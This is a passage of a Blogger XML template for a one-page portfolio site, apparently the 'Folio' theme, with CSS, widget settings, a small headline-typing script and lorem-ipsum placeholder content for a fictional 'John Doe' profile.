{transform:translateZ(0)}to{visibility:hidden;transform:translate3d(0,100%,0)}}.slideOutDown{anima
tion-name:slideOutDown}@keyframes slideOutLeft{0%
{transform:translateZ(0)}to{visibility:hidden;transform:translate3d(-
100%,0,0)}}.slideOutLeft{animation-name:slideOutLeft}@keyframes slideOutRight{0%
{transform:translateZ(0)}to{visibility:hidden;transform:translate3d(100%,0,0)}}.slideOutRight{anima
tion-name:slideOutRight}@keyframes slideOutUp{0%
{transform:translateZ(0)}to{visibility:hidden;transform:translate3d(0,-
100%,0)}}.slideOutUp{animation-name:slideOutUp}

</style>

</b:if>

<style>

/*-------Typography and ShortCodes-------*/

.firstcharacter{float:left;color:#27ae60;font-size:75px;line-height:60px;padding-top:4px;padding-
right:8px;padding-left:3px}.post-body h1,.post-body h2,.post-body h3,.post-body h4,.post-body
h5,.post-body h6{margin-bottom:15px;color:#2c3e50}blockquote{font-style:italic;color:#888;border-
left:5px solid #27ae60;margin-left:0;padding:10px
15px}blockquote:before{content:&#39;\f10d&#39;;display:inline-block;font-
family:FontAwesome;font-style:normal;font-weight:400;line-height:1;-webkit-font-
smoothing:antialiased;-moz-osx-font-smoothing:grayscale;margin-
right:10px;color:#888}blockquote:after{content:&#39;\f10e&#39;;display:inline-block;font-
family:FontAwesome;font-style:normal;font-weight:400;line-height:1;-webkit-font-
smoothing:antialiased;-moz-osx-font-smoothing:grayscale;margin-
left:10px;color:#888}.button{background-color:#2c3e50;float:left;padding:5px
12px;margin:5px;color:#fff;text-align:center;border:0;cursor:pointer;border-
radius:3px;display:block;text-decoration:none;font-weight:400;transition:all .3s ease-out !
important;-webkit-transition:all .3s ease-out !
important}a.button{color:#fff}.button:hover{background-
color:#27ae60;color:#fff}.button.small{font-size:12px;padding:5px 12px}.button.medium{font-
size:16px;padding:6px 15px}.button.large{font-size:18px;padding:8px 18px}.small-
button{width:100%;overflow:hidden;clear:both}.medium-
button{width:100%;overflow:hidden;clear:both}.large-
button{width:100%;overflow:hidden;clear:both}.demo:before{content:&quot;\f06e&quot;;margin-
right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-
height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-
smoothing:grayscale}.download:before{content:&quot;\f019&quot;;margin-right:5px;display:inline-
block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-
smoothing:antialiased;-moz-osx-font-
smoothing:grayscale}.buy:before{content:&quot;\f09d&quot;;margin-right:5px;display:inline-
block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-
smoothing:antialiased;-moz-osx-font-
smoothing:grayscale}.visit:before{content:&quot;\f14c&quot;;margin-right:5px;display:inline-
block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-
smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.widget .post-body ul,.widget .post-body
ol{line-height:1.5;font-weight:400}.widget .post-body li{margin:5px 0;padding:0;line-
height:1.5}.post-body ul li:before{content:&quot;\f105&quot;;margin-right:5px;font-
family:fontawesome}pre{font-family:Monaco, &quot;Andale Mono&quot;, &quot;Courier
New&quot;, Courier, monospace;background-color:#2c3e50;background-image:-webkit-linear-
gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-moz-linear-
gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-ms-linear-
gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-o-linear-
gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:linear-
gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);-webkit-background-size:100%
50px;-moz-background-size:100% 50px;background-size:100% 50px;line-
height:25px;color:#f1f1f1;position:relative;padding:0 7px;margin:15px 0
10px;overflow:hidden;word-wrap:normal;white-
space:pre;position:relative}pre:before{content:&#39;Code&#39;;display:block;background:#F7F7F7;
margin-left:-7px;margin-right:-7px;color:#2c3e50;padding-left:7px;font-weight:400;font-
size:14px}pre code,pre .line-number{display:block}pre .line-number
a{color:#27ae60;opacity:0.6}pre .line-number
span{display:block;float:left;clear:both;width:20px;text-align:center;margin-left:-7px;margin-
right:7px}pre .line-number span:nth-child(odd){background-color:rgba(0, 0, 0, 0.11)}pre .line-
number span:nth-child(even){background-color:rgba(255, 255, 255, 0.05)}pre
.cl{display:block;clear:both}#contact{background-color:#fff;margin:30px 0 !important}#contact
.contact-form-widget{max-width:100% !important}#contact .contact-form-name,#contact .contact-
form-email,#contact .contact-form-email-message{background-color:#FFF;border:1px solid
#eee;border-radius:3px;padding:10px;margin-bottom:10px !important;max-width:100% !
important}#contact .contact-form-name{width:47.7%;height:50px}#contact .contact-form-
email{width:49.7%;height:50px}#contact .contact-form-email-message{height:150px}#contact
.contact-form-button-submit{max-width:100%;width:100%;z-index:0;margin:4px 0 0;padding:10px !
important;text-align:center;cursor:pointer;background:#27ae60;border:0;height:auto;-webkit-
border-radius:2px;-moz-border-radius:2px;-ms-border-radius:2px;-o-border-radius:2px;border-
radius:2px;text-transform:uppercase;-webkit-transition:all .2s ease-out;-moz-transition:all .2s ease-
out;-o-transition:all .2s ease-out;-ms-transition:all .2s ease-out;transition:all .2s ease-
out;color:#FFF}#contact .contact-form-button-submit:hover{background:#2c3e50}#contact .contact-
form-email:focus,#contact .contact-form-name:focus,#contact .contact-form-email-
message:focus{box-shadow:none !important}.alert-
message{position:relative;display:block;background-color:#FAFAFA;padding:20px;margin:20px 0;-
webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;color:#2f3239;border:1px
solid}.alert-message p{margin:0 !important;padding:0;line-height:22px;font-
size:13px;color:#2f3239}.alert-message span{font-size:14px !important}.alert-message i{font-
size:16px;line-height:20px}.alert-message.success{background-color:#f1f9f7;border-
color:#e0f1e9;color:#1d9d74}.alert-message.success a,.alert-message.success
span{color:#1d9d74}.alert-message.alert{background-color:#DAEFFF;border-
color:#8ED2FF;color:#378FFF}.alert-message.alert a,.alert-message.alert span{color:#378FFF}.alert-
message.warning{background-color:#fcf8e3;border-color:#faebcc;color:#8a6d3b}.alert-
message.warning a,.alert-message.warning span{color:#8a6d3b}.alert-message.error{background-
color:#FFD7D2;border-color:#FF9494;color:#F55D5D}.alert-message.error a,.alert-message.error
span{color:#F55D5D}.fa-check-circle:before{content:&quot;\f058&quot;}.fa-info-
circle:before{content:&quot;\f05a&quot;}.fa-exclamation-
triangle:before{content:&quot;\f071&quot;}.fa-exclamation-
circle:before{content:&quot;\f06a&quot;}.post-table table{border-
collapse:collapse;width:100%}.post-table th{background-color:#eee;font-weight:bold}.post-table
th,.post-table td{border:0.125em solid #333;line-height:1.5;padding:0.75em;text-align:left}@media
(max-width: 30em){.post-table thead tr{position:absolute;top:-9999em;left:-9999em}.post-table
tr{border:0.125em solid #333;border-bottom:0}.post-table tr + tr{margin-top:1.5em}.post-table
tr,.post-table td{display:block}.post-table td{border:none;border-bottom:0.125em solid
#333;padding-left:50%}.post-table td:before{content:attr(data-label);display:inline-block;font-
weight:bold;line-height:1.5;margin-left:-100%;width:100%}}@media (max-width: 20em){.post-table
td{padding-left:0.75em}.post-table td:before{display:block;margin-bottom:0.75em;margin-left:0}}

.FollowByEmail {

clear: both;

</style>

<b:template-skin><![CDATA[

/*------Layout (No Edit)----------*/

#layout .preloader, #layout .scrolling-menu {

display: none;

#layout .sora-contact-widget {

display:none;

body#layout #outer-wrapper {

padding: 0;

width: 800px

body#layout .section h4 {

color: #333!important;

text-align:center;

text-transform:uppercase;

letter-spacing:1.5px;

body#layout .tm-menu, body#layout #menu {


height: auto;

position:static;

body#layout #menu .widget {

display: block;

visibility:visible;

body#layout #header-wrapper {

height: auto;

body#layout #content-wrapper {

margin: 0 auto;

padding:0;

body#layout #main-wrapper {

float: left;

width: 70%;

margin: 0;

padding: 0

body#layout #sidebar-wrapper {

float: right;

width: 30%;

margin: 0;

padding: 0;

display: block;

visibility: visible;

height: auto;

opacity: 1;

body#layout #sidebar-wrapper .section {


background-color: #f8e244 !important;

border: 1px solid #fff

body#layout #sidebar-wrapper .section h4 {

color:#fff;

body#layout #sidebar-wrapper .section .widget-content {

border-color: #5a7ea2!important

body#layout #sidebar-wrapper .section .draggable-widget .widget-wrap2 {

background-color: #0080ce !important

body#layout #main-wrapper #main {

margin-right: 4px;

background-color: #5a7ea2;

border-color: #34495e

body#layout #main-wrapper #main h4 {

color: #fff!important

body#layout .layout-widget-description {

display: none!important

body#layout #Blog1 .widget-content {

border-color: #34495e

body#layout .draggable-widget .widget-wrap2 {

background: #0080ce url(https://www.blogger.com/img/widgets/draggable.png) no-repeat 4px


50%;

body#layout .editlink {
background: #0080ce;

color: #fff !important;

padding: 0 3px;

line-height: 18px;

border: 1px solid #2469d9;

border-radius: 3px;

text-transform: uppercase;

letter-spacing: 1px;

text-decoration: none !important;

body#layout .add_widget {

background: #fff;

body#layout .tm-menu .section {

background-color: #f6b3d2 !important;

border: 1px solid #ed67a7

body#layout .header {

background-color: #f2132d !important;

border: 1px solid #f53551

body#layout .feat-slider-wrap .section {

background-color: #a0d3db !important;

border: 1px solid #a2dbeb

body#layout .insta-wrap .section {

background-color: #a0d3db !important;

border: 1px solid #a2dbeb

body#layout .FollowByEmail .widget-content:before, body#layout .jugas_footer_copyright {

display:none;
}

body#layout .sora-special-box, body#layout .sora-works-box, body#layout .sora-about-box,


body#layout .insta-wrap, body#layout .Portfolio-title {display:none;}

/*------Layout (end)----------*/

]]></b:template-skin>

<b:include data='blog' name='google-analytics'/>

<script type='text/javascript'>

//<![CDATA[

var no_image = "http://3.bp.blogspot.com/-


Yw8BIuvwoSQ/VsjkCIMoltI/AAAAAAAAC4c/s55PW6xEKn0/s1600-r/nth.png";

var month_format = [, "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sept", "Oct", "Nov",
"Dec"];

var more_text = "View More";

var comments_text = "<span>Post </span>Comment";

var pagenav_prev = "Previous";

var pagenav_next = "Next";

//]]>

</script>

</head>

<body expr:class='data:blog.pageType'>

<div class='preloader'>

<div class='loader'/></div>

&lt;div id=&quot;outer-wrapper&quot; class=&quot;<data:blog.pageType/><b:if cond='data:blog.url


== data:blog.homepageUrl'> home</b:if><b:if cond='data:blog.pageType ==
&quot;static_page&quot;'> item</b:if><b:if cond='data:blog.pageType == &quot;archive&quot;'>
index</b:if>&quot;&gt;

<div class='scroll-header' id='head-trigger'>

<div class='scroll-head-wrap row'>

<div class='scrollin-logo'>

<b:section class='header' id='header' maxwidgets='1' name='Logo &amp; Title'


showaddelement='no'>
<b:widget id='Header1' locked='true' title='Folio (Header)' type='Header' version='1'>

<b:widget-settings>

<b:widget-setting name='displayUrl'>http://2.bp.blogspot.com/-
Smm8qOlDPNg/W4ZSCkHD1rI/AAAAAAAAFiI/j_yJYU78kY4vqRpSzUm1xXeKze3PJaP2QCK4BGAYYCw/
s1600/Folio.png</b:widget-setting>

<b:widget-setting name='displayHeight'>56</b:widget-setting>

<b:widget-setting name='sectionWidth'>600</b:widget-setting>

<b:widget-setting name='useImage'>true</b:widget-setting>

<b:widget-setting name='shrinkToFit'>false</b:widget-setting>

<b:widget-setting name='imagePlacement'>REPLACE</b:widget-setting>

<b:widget-setting name='displayWidth'>150</b:widget-setting>

</b:widget-settings>

<b:includable id='main'>

<b:if cond='data:useImage'>

<b:if cond='data:imagePlacement == &quot;BEHIND&quot;'>

<!--

Show image as background to text. You can't really calculate the width

reliably in JS because margins are not taken into account by any of

clientWidth, offsetWidth or scrollWidth, so we don't force a minimum

width if the user is using shrink to fit.

This results in a margin-width's worth of pixels being cropped. If the

user is not using shrink to fit then we expand the header.

-->

<b:if cond='data:mobile'>

<div id='header-inner'>

<div class='titlewrapper' style='background: transparent'>

<h1 class='title' style='background: transparent; border-width: 0px'>

<b:include name='title'/>

</h1>

</div>

<b:include name='description'/>

</div>
<b:else/>

<div expr:style='&quot;background-image: url(\&quot;&quot; + data:sourceUrl +


&quot;\&quot;); &quot; + &quot;background-position: &quot; +
data:backgroundPositionStyleStr + &quot;; &quot; + data:widthStyleStr +
&quot;min-height: &quot; + data:height + &quot;_height: &quot; + data:height
+ &quot;background-repeat: no-repeat; &quot;' id='header-inner'>

<div class='titlewrapper' style='background: transparent'>

<h1 class='title' style='background: transparent; border-width: 0px'>

<b:include name='title'/>

</h1>

</div>

<b:include name='description'/>

</div>

</b:if>

<b:else/>

<!--Show the image only-->

<div id='header-inner'>

<a expr:href='data:blog.homepageUrl' style='display: block'><h1


style='display:none'><data:blog.title/></h1>

<img expr:alt='data:title' expr:height='data:height' expr:id='data:widget.instanceId +


&quot;_headerimg&quot;' expr:src='data:sourceUrl' expr:width='data:width' style='display: block'/>

</a>

<!--Show the description-->

<b:if cond='data:imagePlacement == &quot;BEFORE_DESCRIPTION&quot;'>

<b:include name='description'/>

</b:if>

</div>

</b:if>

<b:else/>

<!--No header image -->

<div id='header-inner'>

<div class='titlewrapper'>

<h1 class='title'>
<b:include name='title'/>

</h1>

</div>

<b:include name='description'/>

</div>

</b:if>

</b:includable>

<b:includable id='description'>

<div class='descriptionwrapper'>

<p class='description'><span><data:description/></span></p>

</div>

</b:includable>

<b:includable id='title'>

<b:if cond='data:blog.url == data:blog.homepageUrl'>

<data:title/>

<b:else/>

<a expr:href='data:blog.homepageUrl'><data:title/></a>

</b:if>

</b:includable>

</b:widget>

</b:section>

</div>

<b:if cond='data:blog.pageType != &quot;static_page&quot;'>

<b:if cond='data:blog.pageType!= &quot;item&quot;'>

<b:if cond='data:blog.pageType != &quot;error_page&quot;'>

<div class='scrolling-menu'>

<ul id='nav'>

<li class='current'><a href='#header-wrapper'>Home</a></li>

<li><a href='#section-1'>About Me</a></li>

<li><a href='#section-2'>Services</a></li>

<li><a href='#main-wrapper'>Portfolio</a></li>
<li><a href='#section-5'>Testimonial</a></li>

<li><a href='#section-7'>Contact</a></li>

</ul><div class='menu-mobile2'/>

</div></b:if></b:if></b:if>

<div class='tm-menu'>

<div class='menu-wrap'>

<b:section class='menu' id='menu' maxwidgets='1' name='Main Menu' showaddelement='yes'>

<b:widget id='LinkList210' locked='true' title='Menu' type='LinkList' version='1'>

<b:widget-settings>

<b:widget-setting name='text-9'>Documentation</b:widget-setting>

<b:widget-setting name='link-9'>http://www.sorabloggingtips.com/2018/09/how-to-setup-
folio-blogger-template.html</b:widget-setting>

<b:widget-setting name='text-8'>Video Documentation</b:widget-setting>

<b:widget-setting name='link-7'>http://folio-
soratemplates.blogspot.com/soratemplates</b:widget-setting>

<b:widget-setting name='link-8'>https://youtu.be/faHhqrEGKA0</b:widget-setting>

<b:widget-setting name='text-10'>Download This Template</b:widget-setting>

<b:widget-setting name='link-5'>https://folio-soratemplates.blogspot.com/p/post-format-
and-page-markup.html</b:widget-setting>

<b:widget-setting name='link-6'>http://www.sorabloggingtips.com/2017/01/how-to-add-
sitemap-widget-in-blogspot-blogs.html</b:widget-setting>

<b:widget-setting name='link-3'>#</b:widget-setting>

<b:widget-setting name='link-4'>#</b:widget-setting>

<b:widget-setting name='text-1'>_Multi DropDown</b:widget-setting>

<b:widget-setting name='text-0'>Features</b:widget-setting>

<b:widget-setting name='text-3'>__Dropdown 2</b:widget-setting>

<b:widget-setting name='text-2'>__Dropdown 1</b:widget-setting>

<b:widget-setting name='text-5'>_ShortCodes</b:widget-setting>

<b:widget-setting name='text-4'>__Dropdown 3</b:widget-setting>

<b:widget-setting name='text-7'>_Error Page</b:widget-setting>

<b:widget-setting name='text-6'>_Sitemap</b:widget-setting>
<b:widget-setting name='sorting'>NONE</b:widget-setting>

<b:widget-setting name='link-1'>#</b:widget-setting>

<b:widget-setting name='link-2'>#</b:widget-setting>

<b:widget-setting name='link-0'>#</b:widget-setting>

<b:widget-setting name='link-10'>http://www.soratemplates.com/2018/08/folio-blogger-
templates.html</b:widget-setting>

</b:widget-settings>

<b:includable id='main'>

<div class='widget-content'>

<ul itemscope='' itemtype='http://schema.org/SiteNavigationElement'>

<li><a expr:href='data:blog.homepageUrl'>Home</a></li>

<b:loop values='data:links' var='link'>

<li itemprop='name'><a expr:href='data:link.target'


itemprop='url'><data:link.name/></a></li>

</b:loop>

</ul>

</div>

</b:includable>

</b:widget>

</b:section>

<div class='menu-mobile'/>

</div>

</div>

</div></div>

<div style='clear: both;'/>

<b:if cond='data:blog.pageType != &quot;static_page&quot;'>

<b:if cond='data:blog.pageType!= &quot;item&quot;'>

<b:if cond='data:blog.pageType != &quot;error_page&quot;'>

<div id='header-wrapper'>
<div class='fenix-head'>

<div class='fenix-sub-head row'>

<div class='header-text'>

<b:section class='logo-text' id='Header Title' maxwidgets='1' name='Header Title Widget'


showaddelement='no'>

<b:widget id='HTML30' locked='false' title='' type='HTML'>

<b:widget-settings>

<b:widget-setting name='content'>&lt;p&gt;

Welcome

&lt;/p&gt;</b:widget-setting>

</b:widget-settings>

<b:includable id='main'>

<!-- only display title if it's non-empty -->

<b:if cond='data:title != &quot;&quot;'>

<h2 class='title'><data:title/></h2>

</b:if>

<div class='widget-content'>

<data:content/>

</div>

<b:include name='quickedit'/>

</b:includable>

</b:widget>

</b:section>

</div>

<div style='clear: both;'/>

<div class='header-logo-desc'>

<b:section class='logo-desc' id='Logo Description' maxwidgets='1' name='Logo Description Widget'


showaddelement='no'>

<b:widget id='HTML3' locked='false' title='' type='HTML'>

<b:widget-settings>
<b:widget-setting name='content'>&lt;div class=&#39;type&#39;&gt;

&lt;span&gt;I Am&lt;/span&gt;&lt;p&gt;&lt;/p&gt;

&lt;/div&gt;

&lt;script language=&#39;javascript&#39; type=&#39;text/javascript&#39;&gt;//&lt;![CDATA[

$(function() {

&quot;use strict&quot;;

$(&quot;.header-logo-desc p&quot;).typed({

strings: [&quot;John Doe&quot;, &quot;a Developer&quot; , &quot; a


Designer&quot;], //Headlines(Change It)

loop: true,

startDelay: 1e3,

backDelay: 2e3

});

});

//]]&gt;&lt;/script&gt;</b:widget-setting>

</b:widget-settings>

<b:includable id='main'>

<!-- only display title if it's non-empty -->

<b:if cond='data:title != &quot;&quot;'>

<h2 class='title'><data:title/></h2>

</b:if>

<div class='widget-content'>

<data:content/>

</div>

<b:include name='quickedit'/>

</b:includable>

</b:widget>

</b:section>

</div>

<div style='clear: both;'/>


<div class='social-head'>

<b:section class='top-bar-social blue' id='header social widget' maxwidgets='1' name='Top Social


Widget' showaddelement='no'>

<b:widget id='LinkList230' locked='true' title='Social Media Icons' type='LinkList' version='1'>

<b:widget-settings>

<b:widget-setting name='link-5'>#</b:widget-setting>

<b:widget-setting name='link-3'>#</b:widget-setting>

<b:widget-setting name='link-4'>#</b:widget-setting>

<b:widget-setting name='text-1'>twitter</b:widget-setting>

<b:widget-setting name='text-0'>facebook</b:widget-setting>

<b:widget-setting name='text-3'>instagram</b:widget-setting>

<b:widget-setting name='text-2'>gplus</b:widget-setting>

<b:widget-setting name='text-5'>linkedin</b:widget-setting>

<b:widget-setting name='text-4'>pinterest</b:widget-setting>

<b:widget-setting name='sorting'>NONE</b:widget-setting>

<b:widget-setting name='link-1'>#</b:widget-setting>

<b:widget-setting name='link-2'>#</b:widget-setting>

<b:widget-setting name='link-0'>#</b:widget-setting>

</b:widget-settings>

<b:includable id='main'>

<div class='widget-content'>

<ul id='social'>

<b:loop values='data:links' var='link'>

<li><a expr:class='data:link.name' expr:href='data:link.target'


expr:title='data:link.name'/></li>

</b:loop>

</ul>

</div>

</b:includable>

</b:widget>

</b:section>
</div>

<div class='slide-in wow bounceInUp' data-wow-delay='1s' data-wow-duration='1s'>

<a class='pointer' href='#section-2'/>

</div>

</div>

</div>

<div class='svg'>

<svg viewBox='0 186.5 1920 113.5' x='0px' y='0px'>

<polygon points='-30,300 355.167,210.5 1432.5,290 1920,198.5 1920,300'/>

</svg>

</div>

</div>

<div style='clear: both;'/>

</b:if>

</b:if>

</b:if>

<b:if cond='data:blog.pageType != &quot;static_page&quot;'>

<b:if cond='data:blog.pageType!= &quot;item&quot;'>

<b:if cond='data:blog.pageType != &quot;error_page&quot;'>

<div class='fenix-head-author'>

<div class='fenix-sub-head-auth wow fadeInUp hero-row' id='section-1' style='visibility:


visible;animation-delay: 1.2s;'>

<div class='sora-author-box'>

<div class='sora-author-box-image'><img alt='Author Image' class='avatar avatar-60 photo'


src='https://1.bp.blogspot.com/-
lS8BCMfild4/WaUv1I0ZzxI/AAAAAAAADvI/TRbkU8DD6qAMXTEciXxlZXakbMGB29xWQCK4BGAYYCw/
s1600/team_2.jpg'/></div>

<div class='sora-author-box-text'>

<div class='sora-author-box-text-head'>

<span class='hello-txt'>Hello</span>

<h2 class='profile-title'><span>I&#39;m</span> John Doe</h2>


<h3 class='profile-position'>Developer and businessman</h3>

</div>

<div class='sora-author-box-text-details'>

<span>

<p>

Lorem Ipsum is simply dummy text of the an took a galley of type and it to make a type specimen
book It has survived not only five centuries.</p>

<br/>

<p>

Lorem Ipsum is simply dummy text of the printing and type setting industry when an unknown
printer took a galley and type setting unknown printer industry when of type and scrambled it to
make a type specimen book It has survived not only five centuries.

</p></span>

</div>

</div></div>

</div>

</div>

<div style='clear: both;'/>

<div class='sora-special-box wow slideInUp' id='section-2'>

<div class='special-wrap row'>

<div class='special-title wow fadeInUp animated' style='visibility: visible;'>

<h4>Skilss &amp; Info</h4>

</div>

<div style='clear: both;'/>

<div class='skills'>

<!-- skill -->

<dl>

<dt>HTML</dt>

<dd class='skill-percent html' data-percent='90'/>

<dt>CSS</dt>

<dd class='skill-percent css' data-percent='85'/>

<dt>jQuery</dt>
<dd class='skill-percent jquery' data-percent='70'/>

<dt>SCSS</dt>

<dd class='skill-percent scss' data-percent='60'/>

<dt>Javascript</dt>

<dd class='skill-percent javascript' data-percent='50'/>

<dt>PHP</dt>

<dd class='skill-percent php' data-percent='30'/>

<dt>XML</dt>

<dd class='skill-percent xml' data-percent='40'/>

</dl>

<!-- #skill -->

</div>

<div class='skill-details'>

<div class='sora-author-box-text-details'>

<ul class='profile-list'>

<li class='clearfix'>

<strong class='list-title'>Age</strong>

<span class='cont'>29</span>

</li>

<li class='clearfix'>

<strong class='list-title'>Address</strong>

<span class='cont'>24058, Belgium, Brussels, Liutte 27, BE</span>

</li>

<li class='clearfix'>

<strong class='list-title'>Blog</strong>

<span class='cont'>blog.yourdomain.com</span>

</li>

<li class='clearfix'>

<strong class='list-title'>E-mail</strong>

<span class='cont'><a
href='mailto:robertsmith@company.com'>robertsmith@company.com</a></span>
</li>

<li class='clearfix'>

<strong class='list-title'>Site</strong>

<span class='cont'>http://www.yourdomain.com</span>

</li>

<li class='clearfix'>

<strong class='list-title'>Phone</strong>

<span class='cont'><a href='tel:+12562548456'>+1 256 254 84 56</a></span>

</li>

<li class='clearfix'>

<strong class='list-title'>Freelance</strong>

<span class='cont'>till April 15, 2016</span>

</li>

<li class='clearfix'>

<strong class='list-title'><span class='list-button'>On Vacation</span></strong>

<span class='cont'><i class='fa fa-calendar'/>till March 25, 2016</span>

</li>

</ul>

</div>

</div>

</div></div>

<div style='clear: both;'/>

<div class='sora-special-box wow slideInUp' id='section-2'>

<div class='special-wrap row'>

<div class='special-title wow fadeInUp animated' style='visibility: visible;'>

<h4>What Do We Offer</h4>

</div>

<div style='clear: both;'/>

<div class='skill-details-works'>

<!-- First -->

<div class='special-tiles wow fadeInUp' data-wow-delay='0s'>


<div class='special-tiles-wrap'>

<span class='special-icons'>

<i aria-hidden='true' class='fa fa-heart-o'/>

</span>

<span class='special-content'>

<h6 class='special-heading'>Web Designing</h6>

<p class='special-text'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.
Lorem Ipsum has been the industry&#39;s. </p></span>

</div>

</div>

<!-- First One Ends -->

<!-- Second -->

<div class='special-tiles wow fadeInUp' data-wow-delay='0.2s'>

<div class='special-tiles-wrap'>

<span class='special-icons'>

<i aria-hidden='true' class='fa fa-birthday-cake'/>

</span>

<span class='special-content'>

<h6 class='special-heading'>App Development</h6>

<p class='special-text'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.
Lorem Ipsum has been the industry&#39;s. </p></span>

</div>

</div>

<!-- Second Ends -->

<!-- Third -->

<div class='special-tiles wow fadeInUp' data-wow-delay='0.3s'>

<div class='special-tiles-wrap'>

<span class='special-icons'>

<i aria-hidden='true' class='fa fa-cutlery'/>

</span>
<span class='special-content'>

<h6 class='special-heading'>Web Application</h6>

<p class='special-text'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.
Lorem Ipsum has been the industry&#39;s. </p></span>

</div>

</div>

<!-- Third Ends -->

<!-- First -->

<div class='special-tiles wow fadeInUp' data-wow-delay='0s'>

<div class='special-tiles-wrap'>

<span class='special-icons'>

<i aria-hidden='true' class='fa fa-heart-o'/>

</span>

<span class='special-content'>

<h6 class='special-heading'>Web Designing</h6>

<p class='special-text'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.
Lorem Ipsum has been the industry&#39;s. </p></span>

</div>

</div>

<!-- First One Ends -->

<!-- Second -->

<div class='special-tiles wow fadeInUp' data-wow-delay='0.2s'>

<div class='special-tiles-wrap'>

<span class='special-icons'>

<i aria-hidden='true' class='fa fa-birthday-cake'/>

</span>

<span class='special-content'>

<h6 class='special-heading'>App Development</h6>


<p class='special-text'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.
Lorem Ipsum has been the industry&#39;s. </p></span>

</div>

</div>

<!-- Second Ends -->

<!-- Third -->

<div class='special-tiles wow fadeInUp' data-wow-delay='0.3s'>

<div class='special-tiles-wrap'>

<span class='special-icons'>

<i aria-hidden='true' class='fa fa-cutlery'/>

</span>

<span class='special-content'>

<h6 class='special-heading'>Web Application</h6>

<p class='special-text'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.
Lorem Ipsum has been the industry&#39;s. </p></span>

</div>

</div>

<!-- Third Ends -->

</div>

</div></div>

<div style='clear: both;'/>

<div class='counter-box wow slideInUp'>

<div class='row counter-box-wrap'>

<div class='counter-box-item'>

<i class='color lnr lnr-code'/>

<h1 class='counter-sora'>3000</h1>

<div class='counter-sora-text'>Projects Completed</div>

</div>

<div class='counter-box-item'>

<i class='color lnr lnr-coffee-cup'/>

<h1 class='counter-sora'>50</h1>
<div class='counter-sora-text'>Happy Customers</div>

</div>

<div class='counter-box-item'>

<i class='color lnr lnr-book'/>

<h1 class='counter-sora'>324</h1>

<div class='counter-sora-text'>Cups Of Coffee</div>

</div>

<div class='counter-box-item'>

<i class='color lnr lnr-gift'/>

<h1 class='counter-sora'>1234</h1>

<div class='counter-sora-text'>Awards</div>

</div>

</div>

</div>

<div style='clear:both;'/>

<div class='Portfolio-title'>

<h4>Our Portfolio.</h4>

<span>A creative agency that believes in the power of creative ideas and great design.</span>

</div><div style='clear:both;'/>

</b:if> </b:if> </b:if>

<div class='row' id='content-wrapper'>

<div id='main-wrapper'>

<b:section class='main' id='main' showaddelement='yes'>

<b:widget id='Blog1' locked='true' title='Blog Posts' type='Blog' version='1'>

<b:widget-settings>

<b:widget-setting name='showDateHeader'>true</b:widget-setting>

<b:widget-setting name='style.textcolor'>#c0af94</b:widget-setting>

<b:widget-setting name='showShareButtons'>true</b:widget-setting>

<b:widget-setting name='authorLabel'>By</b:widget-setting>

<b:widget-setting name='showCommentLink'>true</b:widget-setting>

<b:widget-setting name='style.urlcolor'>#c0af94</b:widget-setting>
<b:widget-setting name='showAuthor'>false</b:widget-setting>

<b:widget-setting name='style.linkcolor'>#c0af94</b:widget-setting>

<b:widget-setting name='style.unittype'>TextAndImage</b:widget-setting>

<b:widget-setting name='style.bgcolor'>#000000</b:widget-setting>

<b:widget-setting name='showAuthorProfile'>false</b:widget-setting>

<b:widget-setting name='style.layout'>1x1</b:widget-setting>

<b:widget-setting name='showLabels'>true</b:widget-setting>

<b:widget-setting name='showLocation'>true</b:widget-setting>

<b:widget-setting name='showTimestamp'>true</b:widget-setting>

<b:widget-setting name='postsPerAd'>3</b:widget-setting>

<b:widget-setting name='showBacklinks'>false</b:widget-setting>

<b:widget-setting name='style.bordercolor'>#000000</b:widget-setting>

<b:widget-setting name='showInlineAds'>true</b:widget-setting>

<b:widget-setting name='showReactions'>false</b:widget-setting>

</b:widget-settings>

<b:includable id='main' var='top'>

<b:if cond='!data:mobile'>

<!-- posts -->

<div class='blog-posts hfeed'>

<b:include data='top' name='status-message'/>

<div class='post-grid wow fadeInUp' style='visibility: visible;'>

<b:loop values='data:posts' var='post'>

<div class='post-grid-item wow flipInX' style='visibility: visible;'>

<b:include data='post' name='post'/>

<b:include cond='data:blog.pageType in {&quot;static_page&quot;,&quot;item&quot;}'


data='post' name='comment_picker'/>

</div>
</b:loop>

</div>

</div>

<!-- navigation -->

<b:include name='nextprev'/>

<!-- feed links -->

<b:include name='feedLinks'/>

<b:else/>

<b:include name='mobile-main'/>

</b:if>

<b:if cond='data:top.showPlusOne'>

<data:top.googlePlusBootstrap/>

</b:if>

</b:includable>

<b:includable id='backlinkDeleteIcon' var='backlink'>

<span expr:class='&quot;item-control &quot; + data:backlink.adminClass'>

<a expr:href='data:backlink.deleteUrl' expr:title='data:top.deleteBacklinkMsg'>

<img src='https://resources.blogblog.com/img/icon_delete13.gif'/>

</a>

</span>

</b:includable>

<b:includable id='backlinks' var='post'>

<a name='links'/><h4><data:post.backlinksLabel/></h4>

<b:if cond='data:post.numBacklinks != 0'>

<dl class='comments-block' id='comments-block'>


<b:loop values='data:post.backlinks' var='backlink'>

<div class='collapsed-backlink backlink-control'>

<dt class='comment-title'>

<span class='backlink-toggle-zippy'>&#160;</span>

<a expr:href='data:backlink.url' rel='nofollow'><data:backlink.title/></a>

<b:include data='backlink' name='backlinkDeleteIcon'/>

</dt>

<dd class='comment-body collapseable'>

